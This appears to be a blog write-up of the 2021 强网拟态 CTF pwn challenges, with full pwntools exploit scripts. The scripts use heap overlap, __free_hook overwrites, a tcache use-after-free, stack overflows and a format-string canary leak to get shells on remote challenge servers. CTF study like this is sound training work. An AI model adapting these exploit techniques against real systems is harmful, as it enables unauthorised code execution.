2021强网拟态国际赛

Word count: 1.8k   |   Reading time≈ 10 min

无意冒犯,pwn的random出题人祖坟冒烟

pwn的全部附件和大部分题目exp我丢到网盘了,

链接:https://pan.baidu.com/s/1kPjyRjlI3j4axpnAmwKgiA
提取码:tslh
–来自百度网盘超级会员V3的分享

bitflip

给了个后门,我不会用,直接暴打。

利用scanf传入过大数据会申请chunk的特性,用它来整理fastbin为smallbin

泄露libc,最后利用chunk extend造成堆重叠打free_hook,完美梭哈

(注意的是-0x18是因为他会占用0x10大小的空间当堆头放insure_size和prev_size)

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
from pwn import *
#r=process('./bitflip')
r=remote('124.71.130.185','49153')
context.log_level='debug'
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
one=[0x4f3d5,0x4f432,0x10a41c]
def add(idx,size):
	r.recv()
	r.sendline('1')
	r.recv()
	r.sendline(str(idx))
	r.recv()
	r.sendline(str(size))

def edit(idx,con):
	r.recv()
	r.sendline('2')
	r.recv()
	r.sendline(str(idx))
	r.recv()
	r.send(con)

def show(idx):
	r.recv()
	r.sendline('3')
	r.sendlineafter("Index: ",str(idx))
def dele(idx):
	r.recv()
	r.sendline('4')

	r.sendlineafter("Index: ",str(idx))

for i in range(9):
	add(i,0x28)
for i in range(8):
	dele(i)
add(15,'99999999'*0xf0)
for i in range(8):
	add(i,0x28)
show(7)
r.recvuntil("Content: ")
leak=u64(r.recv(6)+'\x00'*2)
print(hex(leak))
base=leak-0x3ebcc0
print(hex(base))
for i in range(9,16):
	add(i,0x18)
for i in range(9,16):
	dele(i)
add(15,0x18)
add(14,0x18)
show(14)
r.recvuntil("Content: ")
heap=u64(r.recv(6)+'\x00'*2)
print(hex(heap))
heap_base=heap-0x490
dele(15)
dele(16)

for i in range(9,16):
	add(i,0x18)
for i in range(16,23):
	add(i,0x28)
add(23,0x18)
add(24,0x28)
add(25,0x18)
add(26,0x18)
for i in range(9,16):
	dele(i)
for i in range(16,23):
	dele(i)
dele(25)
edit(23,'a'*0x18+'\x51')
dele(24)
add(9,0x48)
free=base+libc.sym["__free_hook"]
edit(9,p64(0)*5+p64(0x21)+p64(free-0x18)+'a'*0x10+'\x21')
for i in range(10,17):
	add(i,0x18)
edit(23,'a'*0x18+'\x21')

add(17,0x18)
add(18,0x18)
sys=base+libc.sym['system']
edit(17,'/bin/sh\x00\n')
edit(18,'/bin/sh\x00'+p64(sys)+'\n')
dele(17)

r.interactive()

old_school

off by one,比较自由,chunk大小在0x100内。

直接overlap套路,构造堆重叠,打free_hook乱杀。

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
from pwn import *
r=process('./old_school')
#r=remote('121.36.194.21','49154')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
def add(idx,size):
	r.recv()
	r.sendline('1')
	r.recv()
	r.sendline(str(idx))
	r.recv()
	r.sendline(str(size))

def edit(idx,con):
	r.recv()
	r.sendline('2')
	r.recv()
	r.sendline(str(idx))
	r.recv()
	r.sendline(con)

def show(idx):
	r.recv()
	r.sendline('3')
	r.recv()
	r.sendline(str(idx))
def dele(idx):
	r.recv()
	r.sendline('4')
	r.recv()
	r.sendline(str(idx))
for i in range(7):
	add(i,0x80)
for i in range(7,14):
	add(i,0xc0)
add(14,0x80)
add(15,0x18)
add(16,0x18)
add(17,0x80)
add(18,0x10)
for i in range(7):
	dele(i)

for i  in range(7,14):
	dele(i)
dele(14)
edit(16,'a'*0x10+p64(0xd0)+'\x90')
gdb.attach(r)

dele(17)
gdb.attach(r)

for i in range(7):
	add(i,0x80)

add(19,0x80)
show(19)
r.recvuntil("Content: ")
leak=u64(r.recv(6)+'\x00'*2)
base=leak-0x3ebdf0
free=base+libc.sym['__free_hook']
sys=base+libc.sym['system']
print(hex(base))

for i in range(7):
	dele(i)
dele(19)
for i in range(7):
	add(i,0x80)
add(20,0x80)
add(21,0x80)
#gdb.attach(r)
dele(15)
#gdb.attach(r)
edit(21,p64(free-0x8)+'\n')
add(22,0x80)
edit(22,'/bin/sh\x00')
add(23,0x80)
one=[0x4f3d5,0x4f432,0x10a41c]

edit(23,'/bin/sh\x00'+p64(sys))
gdb.attach(r)
dele(22)
r.interactive()

old_school_revenge

old_school的儿子。。。off by null 也是套路,打法和上面的一样

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
from pwn import *
#r=process('./old_school_null')
r=remote('123.60.63.39','49153')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
def add(idx,size):
	r.recv()
	r.sendline('1')
	r.recv()
	r.sendline(str(idx))
	r.recv()
	r.sendline(str(size))

def edit(idx,con):
	r.recv()
	r.sendline('2')
	r.recv()
	r.sendline(str(idx))
	r.recv()
	r.sendline(con)

def show(idx):
	r.recv()
	r.sendline('3')
	r.recv()
	r.sendline(str(idx))
def dele(idx):
	r.recv()
	r.sendline('4')
	r.recv()
	r.sendline(str(idx))
o_g = [0x4f2c5,0x4f322,0x10a38c]
l64 = lambda      :u64(r.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(r.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :r.sendlineafter(str(a),str(b))
sa  = lambda a,b  :r.sendafter(str(a),str(b))
lg  = lambda name,data : r.success(name + ": 0x%x" % data)
se  = lambda payload: r.send(payload)
sl  = lambda payload: r.sendline(payload)
ru  = lambda a     :r.recvuntil(str(a))
for i in range(7):
    add(i,0xf8)
add(7,0xf8)#7
add(8,0x88)#8
add(9,0xf8)#9
add(10,0x88)#10
for i in range(7):
    dele(i)
dele(8)
dele(7)
add(11,0x88)
edit(11,"a"*0x80+p64(0x90+0x100))
dele(9)
for i in range(7):
    add(i,0xf8)
    edit(i,"/bin/sh\x00")
add(12,0xf8)
show(12)


libc_base = l64()-0x3ebf20
lg("libc_base",libc_base)
free=libc_base+libc.sym['__free_hook']
sys=libc_base+libc.sym['system']
add(13,0x88)
dele(0)
dele(9)
add(14,0x88)
dele(11)
edit(13,p64(free-0x8)+'\n')

add(22,0x88)

edit(22,'/bin/sh\x00')
add(23,0x88)
edit(23,'/bin/sh\x00'+p64(sys))
dele(22)

r.interactive()

以上off全家桶了属于是。

下面这个random,出题人别让我逮到不然嘿嘿嘿

random_heap

题目本身就是个2.27的uaf,直接打tc可以完事,结果整个rand,还要小爆破下。

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
#!/usr/bin/python
#-*-coding:utf-8-*- 
from pwn import *
import sys
from ctypes import *
import time
import random

def add(idx,size):
	r.recv()
	r.sendline('1')
	r.recv()
	r.sendline(str(idx))
	r.recv()
	r.sendline(str(size))
def edit(idx,con):
	r.recv()
	r.sendline('2')
	r.recv()
	r.sendline(str(idx))
	r.recv()
	r.sendline(con)
def show(idx):
	r.recv()
	r.sendline('3')
	r.recv()
	r.sendline(str(idx))
def dele(idx):
	r.recv()
	r.sendline('4')
	r.recv()
	r.sendline(str(idx))





def pwn():
	add(0,0xf8)
	add(1,0x100)
	edit(1,"/bin/sh\x00\x00")
	dele(0)
	edit(0,'a'*0x10)
	dele(0)
	show(0)
	r.recvuntil("Content: ",timeout=0.4)
	info = r.recvuntil("\n",timeout=0.4, drop=True)
	heap_addr = u64(info.ljust(8, b"\x00"))
	log.info("heap_addr: "+hex(heap_addr))
	for i in range(6):
		edit(0,'a'*0x10)
		dele(0)
	show(0)
	main_arean_96 = u64(((r.recvuntil("\x7f",timeout=0.4))[-6::]).ljust(8,'\x00'))
	log.info("main_arean_96: "+hex(main_arean_96))
	libc_base = (main_arean_96 - 96) - 0x3ebc40#0x3aec40
	print "libc_base:",hex(libc_base)

	free_hook = libc_base + libc.sym['__free_hook']
	system = libc_base + libc.sym['system']

	add(2,0x18)
	dele(2)
	edit(0,p64(free_hook)*2)
	dele(2)
	edit(0,p64(free_hook)*2)
	add(2,0x18)
	show(2)
	tmp = u64(((r.recvuntil("\x7f",timeout=0.4))[-6::]).ljust(8,'\x00'))
	if(tmp!=free_hook):
		exit()

	#gdb.attach(r,"b *$rebase(0xBCB)")
	#raw_input()

	add(3,0x18)
	edit(3,p64(system))
	dele(1)

	r.sendline("cat flag")
	print r.recvuntil("}",timeout=0.4)


#context.log_level='debug'


#r = process("./random_heap", env={"LD_PRELOAD":"./libc-2.27.so"})
#libc = ELF("libc-2.27.so")
#r = process("./random_heap")
#libc = ELF("/glibc/2.27/amd64/lib/libc.so.6")

#r = process("./uaf")
#libc = ELF("/glibc/2.27/amd64/lib/libc.so.6")
#r = process("./uaf", env={"LD_PRELOAD":"./libc-2.27.so"})
libc = ELF("libc-2.27.so")

#pwn()
#r.interactive()

times = 0
while 1:
	try:
		#r = process("./random_heap")
		r = remote("124.71.140.198",49155)
		pwn()
		r.interactive()
	except:
		times += 1
		print("="*8+str(times)+" times"+"="*8)
		r.close()


image

sonic

签到题,栈溢出跳转后门

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *
#r=process('./sonic')
context.arch = 'amd64'
context.log_level='debug'
r=remote('123.60.63.90','6889')

r.recvuntil(" Address=")
addr=int(r.recv(15),16)
print(hex(addr))
base=addr-0x7cf
print(hex(base))
payload='a'*0x28+p64(base+0x73A)
r.sendline(payload)
r.interactive()

pwnpwn

格式化字符串泄露canary,栈溢出直接打,给了/bin/sh不用libc了

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from pwn import *
#context.log_level='debug'
#r=process('./pwnpwn')
r=remote('124.71.156.217','49153')
r.recv()
r.sendline('1')
r.recvuntil("let us give you some trick\n")
leak=int(r.recv(15),16)
base=leak-0x9b9
print(hex(leak))
r.sendline('2')
r.recv()
payload='%21$p'
r.sendline(payload)
r.recv(2)
canary=int(r.recv(0x12),16)
print(hex(canary))
payload='a'*(0x70-8)+p64(canary)+'a'*8+p64(base+0xb83)+p64(base+0x202010)+p64(base+0x951)
r.sendline(payload)
r.interactive()
  • Copyright: Copyright is owned by the author. For commercial reprints, please contact the author for authorization. For non-commercial reprints, please indicate the source.
  • Copyrights © 2021-2023 H.greed
  • Visitors: | Views:

请我喝杯咖啡吧~

支付宝
微信